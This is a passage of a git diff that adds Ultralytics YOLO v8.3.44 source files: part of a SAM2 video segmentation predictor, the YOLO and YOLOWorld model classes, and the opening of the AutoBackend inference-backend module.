(points or masks) for a specified + object and frame index. It ensures that the prompts are either points or masks, but not both, + and updates the internal state accordingly. It also handles the generation of new segmentations + based on the provided prompts and the existing state. + + Args: + obj_id (int): The ID of the object to which the prompts are associated. + points (torch.Tensor, Optional): The coordinates of the points of interest. Defaults to None. + labels (torch.Tensor, Optional): The labels corresponding to the points. Defaults to None. + masks (torch.Tensor, optional): Binary masks for the object. Defaults to None. + frame_idx (int, optional): The index of the frame to which the prompts are applied. Defaults to 0. + + Returns: + (tuple): A tuple containing the flattened predicted masks and a tensor of ones indicating the number of objects. + + Raises: + AssertionError: If both `masks` and `points` are provided, or neither is provided. + + Note: + - Only one type of prompt (either points or masks) can be added per call. + - If the frame is being tracked for the first time, it is treated as an initial conditioning frame. + - The method handles the consolidation of outputs and resizing of masks to the original video resolution. + """ + assert (masks is None) ^ (points is None), "'masks' and 'points' prompts are not compatible with each other." + obj_idx = self._obj_id_to_idx(obj_id) + + point_inputs = None + pop_key = "point_inputs_per_obj" + if points is not None: + point_inputs = {"point_coords": points, "point_labels": labels} + self.inference_state["point_inputs_per_obj"][obj_idx][frame_idx] = point_inputs + pop_key = "mask_inputs_per_obj" + self.inference_state["mask_inputs_per_obj"][obj_idx][frame_idx] = masks + self.inference_state[pop_key][obj_idx].pop(frame_idx, None) + # If this frame hasn't been tracked before, we treat it as an initial conditioning + # frame, meaning that the inputs points are to generate segments on this frame without + # using any memory from other frames, like in SAM. Otherwise (if it has been tracked), + # the input points will be used to correct the already tracked masks. + is_init_cond_frame = frame_idx not in self.inference_state["frames_already_tracked"] + obj_output_dict = self.inference_state["output_dict_per_obj"][obj_idx] + obj_temp_output_dict = self.inference_state["temp_output_dict_per_obj"][obj_idx] + # Add a frame to conditioning output if it's an initial conditioning frame or + # if the model sees all frames receiving clicks/mask as conditioning frames. + is_cond = is_init_cond_frame or self.model.add_all_frames_to_correct_as_cond + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + + # Get any previously predicted mask logits on this object and feed it along with + # the new clicks into the SAM mask decoder. + prev_sam_mask_logits = None + # lookup temporary output dict first, which contains the most recent output + # (if not found, then lookup conditioning and non-conditioning frame output) + if point_inputs is not None: + prev_out = ( + obj_temp_output_dict[storage_key].get(frame_idx) + or obj_output_dict["cond_frame_outputs"].get(frame_idx) + or obj_output_dict["non_cond_frame_outputs"].get(frame_idx) + ) + + if prev_out is not None and prev_out.get("pred_masks") is not None: + prev_sam_mask_logits = prev_out["pred_masks"].to(device=self.device, non_blocking=True) + # Clamp the scale of prev_sam_mask_logits to avoid rare numerical issues. + prev_sam_mask_logits.clamp_(-32.0, 32.0) + current_out = self._run_single_frame_inference( + output_dict=obj_output_dict, # run on the slice of a single object + frame_idx=frame_idx, + batch_size=1, # run on the slice of a single object + is_init_cond_frame=is_init_cond_frame, + point_inputs=point_inputs, + mask_inputs=masks, + reverse=False, + # Skip the memory encoder when adding clicks or mask. We execute the memory encoder + # at the beginning of `propagate_in_video` (after user finalize their clicks). This + # allows us to enforce non-overlapping constraints on all objects before encoding + # them into memory. + run_mem_encoder=False, + prev_sam_mask_logits=prev_sam_mask_logits, + ) + # Add the output to the output dict (to be used as future memory) + obj_temp_output_dict[storage_key][frame_idx] = current_out + + # Resize the output mask to the original video resolution + consolidated_out = self._consolidate_temp_output_across_obj( + frame_idx, + is_cond=is_cond, + run_mem_encoder=False, + ) + pred_masks = consolidated_out["pred_masks"].flatten(0, 1) + return pred_masks.flatten(0, 1), torch.ones(1, dtype=pred_masks.dtype, device=pred_masks.device) + + @smart_inference_mode() + def propagate_in_video_preflight(self): + """ + Prepare inference_state and consolidate temporary outputs before tracking. + + This method marks the start of tracking, disallowing the addition of new objects until the session is reset. + It consolidates temporary outputs from `temp_output_dict_per_obj` and merges them into `output_dict`. + Additionally, it clears non-conditioning memory around input frames and ensures that the state is consistent + with the provided inputs. + """ + # Tracking has started and we don't allow adding new objects until session is reset. + self.inference_state["tracking_has_started"] = True + batch_size = len(self.inference_state["obj_idx_to_id"]) + + # Consolidate per-object temporary outputs in "temp_output_dict_per_obj" and + # add them into "output_dict". + temp_output_dict_per_obj = self.inference_state["temp_output_dict_per_obj"] + output_dict = self.inference_state["output_dict"] + # "consolidated_frame_inds" contains indices of those frames where consolidated + # temporary outputs have been added (either in this call or any previous calls + # to `propagate_in_video_preflight`). + consolidated_frame_inds = self.inference_state["consolidated_frame_inds"] + for is_cond in {False, True}: + # Separately consolidate conditioning and non-conditioning temp outptus + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + # Find all the frames that contain temporary outputs for any objects + # (these should be the frames that have just received clicks for mask inputs + # via `add_new_points` or `add_new_mask`) + temp_frame_inds = set() + for obj_temp_output_dict in temp_output_dict_per_obj.values(): + temp_frame_inds.update(obj_temp_output_dict[storage_key].keys()) + consolidated_frame_inds[storage_key].update(temp_frame_inds) + # consolidate the temprary output across all objects on this frame + for frame_idx in temp_frame_inds: + consolidated_out = self._consolidate_temp_output_across_obj( + frame_idx, is_cond=is_cond, run_mem_encoder=True + ) + # merge them into "output_dict" and also create per-object slices + output_dict[storage_key][frame_idx] = consolidated_out + self._add_output_per_object(frame_idx, consolidated_out, storage_key) + if self.clear_non_cond_mem_around_input and (self.clear_non_cond_mem_for_multi_obj or batch_size <= 1): + # clear non-conditioning memory of the surrounding frames + self._clear_non_cond_mem_around_input(frame_idx) + + # clear temporary outputs in `temp_output_dict_per_obj` + for obj_temp_output_dict in temp_output_dict_per_obj.values(): + obj_temp_output_dict[storage_key].clear() + + # edge case: if an output is added to "cond_frame_outputs", we remove any prior + # output on the same frame in "non_cond_frame_outputs" + for frame_idx in output_dict["cond_frame_outputs"]: + output_dict["non_cond_frame_outputs"].pop(frame_idx, None) + for obj_output_dict in self.inference_state["output_dict_per_obj"].values(): + for frame_idx in obj_output_dict["cond_frame_outputs"]: + obj_output_dict["non_cond_frame_outputs"].pop(frame_idx, None) + for frame_idx in consolidated_frame_inds["cond_frame_outputs"]: + assert frame_idx in output_dict["cond_frame_outputs"] + consolidated_frame_inds["non_cond_frame_outputs"].discard(frame_idx) + + # Make sure that the frame indices in "consolidated_frame_inds" are exactly those frames + # with either points or mask inputs (which should be true under a correct workflow). + all_consolidated_frame_inds = ( + consolidated_frame_inds["cond_frame_outputs"] | consolidated_frame_inds["non_cond_frame_outputs"] + ) + input_frames_inds = set() + for point_inputs_per_frame in self.inference_state["point_inputs_per_obj"].values(): + input_frames_inds.update(point_inputs_per_frame.keys()) + for mask_inputs_per_frame in self.inference_state["mask_inputs_per_obj"].values(): + input_frames_inds.update(mask_inputs_per_frame.keys()) + assert all_consolidated_frame_inds == input_frames_inds + + @staticmethod + def init_state(predictor): + """ + Initialize an inference state for the predictor. + + This function sets up the initial state required for performing inference on video data. + It includes initializing various dictionaries and ordered dictionaries that will store + inputs, outputs, and other metadata relevant to the tracking process. + + Args: + predictor (SAM2VideoPredictor): The predictor object for which to initialize the state. + """ + if len(predictor.inference_state) > 0: # means initialized + return + assert predictor.dataset is not None + assert predictor.dataset.mode == "video" + + inference_state = {} + inference_state["num_frames"] = predictor.dataset.frames + # inputs on each frame + inference_state["point_inputs_per_obj"] = {} + inference_state["mask_inputs_per_obj"] = {} + # values that don't change across frames (so we only need to hold one copy of them) + inference_state["constants"] = {} + # mapping between client-side object id and model-side object index + inference_state["obj_id_to_idx"] = OrderedDict() + inference_state["obj_idx_to_id"] = OrderedDict() + inference_state["obj_ids"] = [] + # A storage to hold the model's tracking results and states on each frame + inference_state["output_dict"] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + # Slice (view) of each object tracking results, sharing the same memory with "output_dict" + inference_state["output_dict_per_obj"] = {} + # A temporary storage to hold new outputs when user interact with a frame + # to add clicks or mask (it's merged into "output_dict" before propagation starts) + inference_state["temp_output_dict_per_obj"] = {} + # Frames that already holds consolidated outputs from click or mask inputs + # (we directly use their consolidated outputs during tracking) + inference_state["consolidated_frame_inds"] = { + "cond_frame_outputs": set(), # set containing frame indices + "non_cond_frame_outputs": set(), # set containing frame indices + } + # metadata for each tracking frame (e.g. which direction it's tracked) + inference_state["tracking_has_started"] = False + inference_state["frames_already_tracked"] = [] + predictor.inference_state = inference_state + + def get_im_features(self, im, batch=1): + """ + Extracts and processes image features using SAM2's image encoder for subsequent segmentation tasks. + + Args: + im (torch.Tensor): The input image tensor. + batch (int, optional): The batch size for expanding features if there are multiple prompts. Defaults to 1. + + Returns: + vis_feats (torch.Tensor): The visual features extracted from the image. + vis_pos_embed (torch.Tensor): The positional embeddings for the visual features. + feat_sizes (List(Tuple[int])): A list containing the sizes of the extracted features. + + Note: + - If `batch` is greater than 1, the features are expanded to fit the batch size. + - The method leverages the model's `_prepare_backbone_features` method to prepare the backbone features. + """ + backbone_out = self.model.forward_image(im) + if batch > 1: # expand features if there's more than one prompt + for i, feat in enumerate(backbone_out["backbone_fpn"]): + backbone_out["backbone_fpn"][i] = feat.expand(batch, -1, -1, -1) + for i, pos in enumerate(backbone_out["vision_pos_enc"]): + pos = pos.expand(batch, -1, -1, -1) + backbone_out["vision_pos_enc"][i] = pos + _, vis_feats, vis_pos_embed, feat_sizes = self.model._prepare_backbone_features(backbone_out) + return vis_feats, vis_pos_embed, feat_sizes + + def _obj_id_to_idx(self, obj_id): + """ + Map client-side object id to model-side object index. + + Args: + obj_id (int): The unique identifier of the object provided by the client side. + + Returns: + obj_idx (int): The index of the object on the model side. + + Raises: + RuntimeError: If an attempt is made to add a new object after tracking has started. + + Note: + - The method updates or retrieves mappings between object IDs and indices stored in + `inference_state`. + - It ensures that new objects can only be added before tracking commences. + - It maintains two-way mappings between IDs and indices (`obj_id_to_idx` and `obj_idx_to_id`). + - Additional data structures are initialized for the new object to store inputs and outputs. + """ + obj_idx = self.inference_state["obj_id_to_idx"].get(obj_id, None) + if obj_idx is not None: + return obj_idx + + # This is a new object id not sent to the server before. We only allow adding + # new objects *before* the tracking starts. + allow_new_object = not self.inference_state["tracking_has_started"] + if allow_new_object: + # get the next object slot + obj_idx = len(self.inference_state["obj_id_to_idx"]) + self.inference_state["obj_id_to_idx"][obj_id] = obj_idx + self.inference_state["obj_idx_to_id"][obj_idx] = obj_id + self.inference_state["obj_ids"] = list(self.inference_state["obj_id_to_idx"]) + # set up input and output structures for this object + self.inference_state["point_inputs_per_obj"][obj_idx] = {} + self.inference_state["mask_inputs_per_obj"][obj_idx] = {} + self.inference_state["output_dict_per_obj"][obj_idx] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + self.inference_state["temp_output_dict_per_obj"][obj_idx] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + return obj_idx + else: + raise RuntimeError( + f"Cannot add new object id {obj_id} after tracking starts. " + f"All existing object ids: {self.inference_state['obj_ids']}. " + f"Please call 'reset_state' to restart from scratch." + ) + + def _run_single_frame_inference( + self, + output_dict, + frame_idx, + batch_size, + is_init_cond_frame, + point_inputs, + mask_inputs, + reverse, + run_mem_encoder, + prev_sam_mask_logits=None, + ): + """ + Run tracking on a single frame based on current inputs and previous memory. + + Args: + output_dict (Dict): The dictionary containing the output states of the tracking process. + frame_idx (int): The index of the current frame. + batch_size (int): The batch size for processing the frame. + is_init_cond_frame (bool): Indicates if the current frame is an initial conditioning frame. + point_inputs (Dict, Optional): Input points and their labels. Defaults to None. + mask_inputs (torch.Tensor, Optional): Input binary masks. Defaults to None. + reverse (bool): Indicates if the tracking should be performed in reverse order. + run_mem_encoder (bool): Indicates if the memory encoder should be executed. + prev_sam_mask_logits (torch.Tensor, Optional): Previous mask logits for the current object. Defaults to None. + + Returns: + current_out (dict): A dictionary containing the output of the tracking step, including updated features and predictions. + + Raises: + AssertionError: If both `point_inputs` and `mask_inputs` are provided, or neither is provided. + + Note: + - The method assumes that `point_inputs` and `mask_inputs` are mutually exclusive. + - The method retrieves image features using the `get_im_features` method. + - The `maskmem_pos_enc` is assumed to be constant across frames, hence only one copy is stored. + - The `fill_holes_in_mask_scores` function is commented out and currently unsupported due to CUDA extension requirements. + """ + # Retrieve correct image features + current_vision_feats, current_vision_pos_embeds, feat_sizes = self.get_im_features( + self.inference_state["im"], batch_size + ) + + # point and mask should not appear as input simultaneously on the same frame + assert point_inputs is None or mask_inputs is None + current_out = self.model.track_step( + frame_idx=frame_idx, + is_init_cond_frame=is_init_cond_frame, + current_vision_feats=current_vision_feats, + current_vision_pos_embeds=current_vision_pos_embeds, + feat_sizes=feat_sizes, + point_inputs=point_inputs, + mask_inputs=mask_inputs, + output_dict=output_dict, + num_frames=self.inference_state["num_frames"], + track_in_reverse=reverse, + run_mem_encoder=run_mem_encoder, + prev_sam_mask_logits=prev_sam_mask_logits, + ) + + maskmem_features = current_out["maskmem_features"] + if maskmem_features is not None: + current_out["maskmem_features"] = maskmem_features.to( + dtype=torch.float16, device=self.device, non_blocking=True + ) + # NOTE: Do not support the `fill_holes_in_mask_scores` function since it needs cuda extensions + # potentially fill holes in the predicted masks + # if self.fill_hole_area > 0: + # pred_masks = current_out["pred_masks"].to(self.device, non_blocking=True) + # pred_masks = fill_holes_in_mask_scores(pred_masks, self.fill_hole_area) + + # "maskmem_pos_enc" is the same across frames, so we only need to store one copy of it + current_out["maskmem_pos_enc"] = self._get_maskmem_pos_enc(current_out["maskmem_pos_enc"]) + return current_out + + def _get_maskmem_pos_enc(self, out_maskmem_pos_enc): + """ + Caches and manages the positional encoding for mask memory across frames and objects. + + This method optimizes storage by caching the positional encoding (`maskmem_pos_enc`) for + mask memory, which is constant across frames and objects, thus reducing the amount of + redundant information stored during an inference session. It checks if the positional + encoding has already been cached; if not, it caches a slice of the provided encoding. + If the batch size is greater than one, it expands the cached positional encoding to match + the current batch size. + + Args: + out_maskmem_pos_enc (List[torch.Tensor] or None): The positional encoding for mask memory. + Should be a list of tensors or None. + + Returns: + out_maskmem_pos_enc (List[torch.Tensor]): The positional encoding for mask memory, either cached or expanded. + + Note: + - The method assumes that `out_maskmem_pos_enc` is a list of tensors or None. + - Only a single object's slice is cached since the encoding is the same across objects. + - The method checks if the positional encoding has already been cached in the session's constants. + - If the batch size is greater than one, the cached encoding is expanded to fit the batch size. + """ + model_constants = self.inference_state["constants"] + # "out_maskmem_pos_enc" should be either a list of tensors or None + if out_maskmem_pos_enc is not None: + if "maskmem_pos_enc" not in model_constants: + assert isinstance(out_maskmem_pos_enc, list) + # only take the slice for one object, since it's same across objects + maskmem_pos_enc = [x[0:1].clone() for x in out_maskmem_pos_enc] + model_constants["maskmem_pos_enc"] = maskmem_pos_enc + else: + maskmem_pos_enc = model_constants["maskmem_pos_enc"] + # expand the cached maskmem_pos_enc to the actual batch size + batch_size = out_maskmem_pos_enc[0].size(0) + if batch_size > 1: + out_maskmem_pos_enc = [x.expand(batch_size, -1, -1, -1) for x in maskmem_pos_enc] + return out_maskmem_pos_enc + + def _consolidate_temp_output_across_obj( + self, + frame_idx, + is_cond=False, + run_mem_encoder=False, + ): + """ + Consolidates per-object temporary outputs into a single output for all objects. + + This method combines the temporary outputs for each object on a given frame into a unified + output. It fills in any missing objects either from the main output dictionary or leaves + placeholders if they do not exist in the main output. Optionally, it can re-run the memory + encoder after applying non-overlapping constraints to the object scores. + + Args: + frame_idx (int): The index of the frame for which to consolidate outputs. + is_cond (bool, Optional): Indicates if the frame is considered a conditioning frame. + Defaults to False. + run_mem_encoder (bool, Optional): Specifies whether to run the memory encoder after + consolidating the outputs. Defaults to False. + + Returns: + consolidated_out (dict): A consolidated output dictionary containing the combined results for all objects. + + Note: + - The method initializes the consolidated output with placeholder values for missing objects. + - It searches for outputs in both the temporary and main output dictionaries. + - If `run_mem_encoder` is True, it applies non-overlapping constraints and re-runs the memory encoder. + - The `maskmem_features` and `maskmem_pos_enc` are only populated when `run_mem_encoder` is True. + """ + batch_size = len(self.inference_state["obj_idx_to_id"]) + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + + # Initialize `consolidated_out`. Its "maskmem_features" and "maskmem_pos_enc" + # will be added when rerunning the memory encoder after applying non-overlapping + # constraints to object scores. Its "pred_masks" are prefilled with a large + # negative value (NO_OBJ_SCORE) to represent missing objects. + consolidated_out = { + "maskmem_features": None, + "maskmem_pos_enc": None, + "pred_masks": torch.full( + size=(batch_size, 1, self.imgsz[0] // 4, self.imgsz[1] // 4), + fill_value=-1024.0, + dtype=torch.float32, + device=self.device, + ), + "obj_ptr": torch.full( + size=(batch_size, self.model.hidden_dim), + fill_value=-1024.0, + dtype=torch.float32, + device=self.device, + ), + "object_score_logits": torch.full( + size=(batch_size, 1), + # default to 10.0 for object_score_logits, i.e. assuming the object is + # present as sigmoid(10)=1, same as in `predict_masks` of `MaskDecoder` + fill_value=10.0, + dtype=torch.float32, + device=self.device, + ), + } + for obj_idx in range(batch_size): + obj_temp_output_dict = self.inference_state["temp_output_dict_per_obj"][obj_idx] + obj_output_dict = self.inference_state["output_dict_per_obj"][obj_idx] + out = ( + obj_temp_output_dict[storage_key].get(frame_idx) + # If the object doesn't appear in "temp_output_dict_per_obj" on this frame, + # we fall back and look up its previous output in "output_dict_per_obj". + # We look up both "cond_frame_outputs" and "non_cond_frame_outputs" in + # "output_dict_per_obj" to find a previous output for this object. + or obj_output_dict["cond_frame_outputs"].get(frame_idx) + or obj_output_dict["non_cond_frame_outputs"].get(frame_idx) + ) + # If the object doesn't appear in "output_dict_per_obj" either, we skip it + # and leave its mask scores to the default scores (i.e. the NO_OBJ_SCORE + # placeholder above) and set its object pointer to be a dummy pointer. + if out is None: + # Fill in dummy object pointers for those objects without any inputs or + # tracking outcomes on this frame (only do it under `run_mem_encoder=True`, + # i.e. when we need to build the memory for tracking). + if run_mem_encoder: + # fill object pointer with a dummy pointer (based on an empty mask) + consolidated_out["obj_ptr"][obj_idx : obj_idx + 1] = self._get_empty_mask_ptr(frame_idx) + continue + # Add the temporary object output mask to consolidated output mask + consolidated_out["pred_masks"][obj_idx : obj_idx + 1] = out["pred_masks"] + consolidated_out["obj_ptr"][obj_idx : obj_idx + 1] = out["obj_ptr"] + + # Optionally, apply non-overlapping constraints on the consolidated scores and rerun the memory encoder + if run_mem_encoder: + high_res_masks = F.interpolate( + consolidated_out["pred_masks"], + size=self.imgsz, + mode="bilinear", + align_corners=False, + ) + if self.model.non_overlap_masks_for_mem_enc: + high_res_masks = self.model._apply_non_overlapping_constraints(high_res_masks) + consolidated_out["maskmem_features"], consolidated_out["maskmem_pos_enc"] = self._run_memory_encoder( + batch_size=batch_size, + high_res_masks=high_res_masks, + is_mask_from_pts=True, # these frames are what the user interacted with + object_score_logits=consolidated_out["object_score_logits"], + ) + + return consolidated_out + + def _get_empty_mask_ptr(self, frame_idx): + """ + Get a dummy object pointer based on an empty mask on the current frame. + + Args: + frame_idx (int): The index of the current frame for which to generate the dummy object pointer. + + Returns: + (torch.Tensor): A tensor representing the dummy object pointer generated from the empty mask. + """ + # Retrieve correct image features + current_vision_feats, current_vision_pos_embeds, feat_sizes = self.get_im_features(self.inference_state["im"]) + + # Feed the empty mask and image feature above to get a dummy object pointer + current_out = self.model.track_step( + frame_idx=frame_idx, + is_init_cond_frame=True, + current_vision_feats=current_vision_feats, + current_vision_pos_embeds=current_vision_pos_embeds, + feat_sizes=feat_sizes, + point_inputs=None, + # A dummy (empty) mask with a single object + mask_inputs=torch.zeros((1, 1, *self.imgsz), dtype=torch.float32, device=self.device), + output_dict={}, + num_frames=self.inference_state["num_frames"], + track_in_reverse=False, + run_mem_encoder=False, + prev_sam_mask_logits=None, + ) + return current_out["obj_ptr"] + + def _run_memory_encoder(self, batch_size, high_res_masks, object_score_logits, is_mask_from_pts): + """ + Run the memory encoder on masks. + + This is usually after applying non-overlapping constraints to object scores. Since their scores changed, their + memory also needs to be computed again with the memory encoder. + + Args: + batch_size (int): The batch size for processing the frame. + high_res_masks (torch.Tensor): High-resolution masks for which to compute the memory. + object_score_logits (torch.Tensor): Logits representing the object scores. + is_mask_from_pts (bool): Indicates if the mask is derived from point interactions. + + Returns: + (tuple[torch.Tensor, torch.Tensor]): A tuple containing the encoded mask features and positional encoding. + """ + # Retrieve correct image features + current_vision_feats, _, feat_sizes = self.get_im_features(self.inference_state["im"], batch_size) + maskmem_features, maskmem_pos_enc = self.model._encode_new_memory( + current_vision_feats=current_vision_feats, + feat_sizes=feat_sizes, + pred_masks_high_res=high_res_masks, + is_mask_from_pts=is_mask_from_pts, + object_score_logits=object_score_logits, + ) + + # "maskmem_pos_enc" is the same across frames, so we only need to store one copy of it + maskmem_pos_enc = self._get_maskmem_pos_enc(maskmem_pos_enc) + return maskmem_features.to(dtype=torch.float16, device=self.device, non_blocking=True), maskmem_pos_enc + + def _add_output_per_object(self, frame_idx, current_out, storage_key): + """ + Split a multi-object output into per-object output slices and add them into Output_Dict_Per_Obj. + + The resulting slices share the same tensor storage. + + Args: + frame_idx (int): The index of the current frame. + current_out (Dict): The current output dictionary containing multi-object outputs. + storage_key (str): The key used to store the output in the per-object output dictionary. + """ + maskmem_features = current_out["maskmem_features"] + assert maskmem_features is None or isinstance(maskmem_features, torch.Tensor) + + maskmem_pos_enc = current_out["maskmem_pos_enc"] + assert maskmem_pos_enc is None or isinstance(maskmem_pos_enc, list) + + for obj_idx, obj_output_dict in self.inference_state["output_dict_per_obj"].items(): + obj_slice = slice(obj_idx, obj_idx + 1) + obj_out = { + "maskmem_features": None, + "maskmem_pos_enc": None, + "pred_masks": current_out["pred_masks"][obj_slice], + "obj_ptr": current_out["obj_ptr"][obj_slice], + } + if maskmem_features is not None: + obj_out["maskmem_features"] = maskmem_features[obj_slice] + if maskmem_pos_enc is not None: + obj_out["maskmem_pos_enc"] = [x[obj_slice] for x in maskmem_pos_enc] + obj_output_dict[storage_key][frame_idx] = obj_out + + def _clear_non_cond_mem_around_input(self, frame_idx): + """ + Remove the non-conditioning memory around the input frame. + + When users provide correction clicks, the surrounding frames' non-conditioning memories can still contain outdated + object appearance information and could confuse the model. This method clears those non-conditioning memories + surrounding the interacted frame to avoid giving the model both old and new information about the object. + + Args: + frame_idx (int): The index of the current frame where user interaction occurred. + """ + r = self.model.memory_temporal_stride_for_eval + frame_idx_begin = frame_idx - r * self.model.num_maskmem + frame_idx_end = frame_idx + r * self.model.num_maskmem + for t in range(frame_idx_begin, frame_idx_end + 1): + self.inference_state["output_dict"]["non_cond_frame_outputs"].pop(t, None) + for obj_output_dict in self.inference_state["output_dict_per_obj"].values(): + obj_output_dict["non_cond_frame_outputs"].pop(t, None) diff --git a/2024.ultralytics/v8.3.44/models/yolo/model.py b/2024.ultralytics/v8.3.44/models/yolo/model.py new file mode 100644 index 0000000..6381960 --- /dev/null +++ b/2024.ultralytics/v8.3.44/models/yolo/model.py @@ -0,0 +1,111 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +from pathlib import Path + +from ultralytics.engine.model import Model +from ultralytics.models import yolo +from ultralytics.nn.tasks import ClassificationModel, DetectionModel, OBBModel, PoseModel, SegmentationModel, WorldModel +from ultralytics.utils import ROOT, yaml_load + + +class YOLO(Model): + """YOLO (You Only Look Once) object detection model.""" + + def __init__(self, model="yolo11n.pt", task=None, verbose=False): + """Initialize YOLO model, switching to YOLOWorld if model filename contains '-world'.""" + path = Path(model) + if "-world" in path.stem and path.suffix in {".pt", ".yaml", ".yml"}: # if YOLOWorld PyTorch model + new_instance = YOLOWorld(path, verbose=verbose) + self.__class__ = type(new_instance) + self.__dict__ = new_instance.__dict__ + else: + # Continue with default YOLO initialization + super().__init__(model=model, task=task, verbose=verbose) + + @property + def task_map(self): + """Map head to model, trainer, validator, and predictor classes.""" + return { + "classify": { + "model": ClassificationModel, + "trainer": yolo.classify.ClassificationTrainer, + "validator": yolo.classify.ClassificationValidator, + "predictor": yolo.classify.ClassificationPredictor, + }, + "detect": { + "model": DetectionModel, + "trainer": yolo.detect.DetectionTrainer, + "validator": yolo.detect.DetectionValidator, + "predictor": yolo.detect.DetectionPredictor, + }, + "segment": { + "model": SegmentationModel, + "trainer": yolo.segment.SegmentationTrainer, + "validator": yolo.segment.SegmentationValidator, + "predictor": yolo.segment.SegmentationPredictor, + }, + "pose": { + "model": PoseModel, + "trainer": yolo.pose.PoseTrainer, + "validator": yolo.pose.PoseValidator, + "predictor": yolo.pose.PosePredictor, + }, + "obb": { + "model": OBBModel, + "trainer": yolo.obb.OBBTrainer, + "validator": yolo.obb.OBBValidator, + "predictor": yolo.obb.OBBPredictor, + }, + } + + +class YOLOWorld(Model): + """YOLO-World object detection model.""" + + def __init__(self, model="yolov8s-world.pt", verbose=False) -> None: + """ + Initialize YOLOv8-World model with a pre-trained model file. + + Loads a YOLOv8-World model for object detection. If no custom class names are provided, it assigns default + COCO class names. + + Args: + model (str | Path): Path to the pre-trained model file. Supports *.pt and *.yaml formats. + verbose (bool): If True, prints additional information during initialization. + """ + super().__init__(model=model, task="detect", verbose=verbose) + + # Assign default COCO class names when there are no custom names + if not hasattr(self.model, "names"): + self.model.names = yaml_load(ROOT / "cfg/datasets/coco8.yaml").get("names") + + @property + def task_map(self): + """Map head to model, validator, and predictor classes.""" + return { + "detect": { + "model": WorldModel, + "validator": yolo.detect.DetectionValidator, + "predictor": yolo.detect.DetectionPredictor, + "trainer": yolo.world.WorldTrainer, + } + } + + def set_classes(self, classes): + """ + Set classes. + + Args: + classes (List(str)): A list of categories i.e. ["person"]. + """ + self.model.set_classes(classes) + # Remove background if it's given + background = " " + if background in classes: + classes.remove(background) + self.model.names = classes + + # Reset method class names + # self.predictor = None # reset predictor otherwise old names remain + if self.predictor: + self.predictor.model.names = classes diff --git a/2024.ultralytics/v8.3.44/nn/autobackend.py b/2024.ultralytics/v8.3.44/nn/autobackend.py new file mode 100644 index 0000000..b6df375 --- /dev/null +++ b/2024.ultralytics/v8.3.44/nn/autobackend.py @@ -0,0 +1,767 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import ast +import json +import platform +import zipfile +from collections import OrderedDict, namedtuple +from pathlib import Path + +import cv2 +import numpy as np +import torch +import torch.nn as nn +from PIL import Image + +from ultralytics.utils import ARM64, IS_JETSON, IS_RASPBERRYPI, LINUX, LOGGER, ROOT, yaml_load +from ultralytics.utils.checks import check_requirements, check_suffix, check_version, check_yaml +from ultralytics.utils.downloads import attempt_download_asset, is_url + + +def check_class_names(names): + """ + Check class names. + + Map imagenet class codes to human-readable names if required. Convert lists to dicts. + """ + if isinstance(names, list): # names is a list + names = dict(enumerate(names)) # convert to dict + if isinstance(names, dict): + # Convert 1) string keys to int, i.e. '0' to 0, and non-string values to strings, i.e. True to 'True' + names = {int(k): str(v) for k, v in names.items()} + n = len(names) + if max(names.keys()) >= n: + raise KeyError( + f"{n}-class dataset requires class indices 0-{n - 1}, but you have invalid class indices " + f"{min(names.keys())}-{max(names.keys())} defined in your dataset YAML." + ) + if isinstance(names[0], str) and names[0].startswith("n0"): # imagenet class codes, i.e. 'n01440764' + names_map = yaml_load(ROOT / "cfg/datasets/ImageNet.yaml")["map"] # human-readable names + names = {k: names_map[v] for k, v in names.items()} + return names + + +def default_class_names(data=None): + """Applies default class names to an input YAML file or returns numerical class names.""" + if data: + try: + return yaml_load(check_yaml(data))["names"] + except Exception: + pass + return {i: f"class{i}" for i in range(999)} # return default if above errors + + +class AutoBackend(nn.Module): + """ + Handles dynamic backend selection for running inference using Ultralytics YOLO models. + + The AutoBackend class is designed to provide an abstraction layer for various inference engines. It supports a wide + range of formats, each with specific naming conventions as outlined below: + + Supported Formats and Naming Conventions: + | Format | File Suffix | + |-----------------------|-------------------| + | PyTorch | *.pt | + | TorchScript | *.torchscript | + | ONNX Runtime | *.onnx | + | ONNX OpenCV DNN | *.onnx (dnn=True) | + | OpenVINO | *openvino_model/ | + | CoreML | *.mlpackage | + | TensorRT | *.engine | + | TensorFlow SavedModel | *_saved_model/ | + | TensorFlow GraphDef | *.pb | + | TensorFlow Lite | *.tflite | + | TensorFlow Edge TPU | *_edgetpu.tflite | + | PaddlePaddle | *_paddle_model/ | + | MNN | *.mnn | + | NCNN | *_ncnn_model/ | + + This class offers dynamic backend switching capabilities based on the input model format, making it easier to deploy + models across various platforms. + """ + + @torch.no_grad() + def __init__( + self, + weights="yolo11n.pt", + device=torch.device("cpu"), + dnn=False, + data=None, + fp16=False, + batch=1, + fuse=True, + verbose=True, + ): + """ + Initialize the AutoBackend for inference. + + Args: + weights (str | torch.nn.Module): Path to the model weights file or a module instance. Defaults to 'yolo11n.pt'. + device (torch.device): Device to run the model on. Defaults to CPU. + dnn (bool): Use OpenCV DNN module for ONNX inference. Defaults to False. + data (str | Path | optional): Path to the additional data.yaml file containing class names. Optional. + fp16 (bool): Enable half-precision inference. Supported only on specific backends. Defaults to False. + batch (int): Batch-size to assume for inference. + fuse (bool): Fuse Conv2D + BatchNorm layers for optimization. Defaults to True. + verbose (bool): Enable verbose logging. Defaults to True. + """ + super().__init__() + w = str(weights[0] if isinstance(weights, list) else weights) + nn_module = isinstance(weights, torch.nn.Module) + ( + pt, + jit, + onnx, + xml, + engine, + coreml, + saved_model, + pb, + tflite, + edgetpu, + tfjs, + paddle, + mnn, + ncnn, + imx, + triton, + ) = self._model_type(w) + fp16 &= pt or jit or onnx or xml or engine or nn_module or triton # FP16 + nhwc = coreml or saved_model or pb or tflite or edgetpu # BHWC formats (vs torch BCWH) + stride = 32 # default stride + model, metadata, task = None, None, None + + # Set device + cuda = torch.cuda.is_available() and device.type != "cpu" # use CUDA + if cuda and not any([nn_module, pt, jit, engine, onnx]): # GPU dataloader formats + device = torch.device("cpu") + 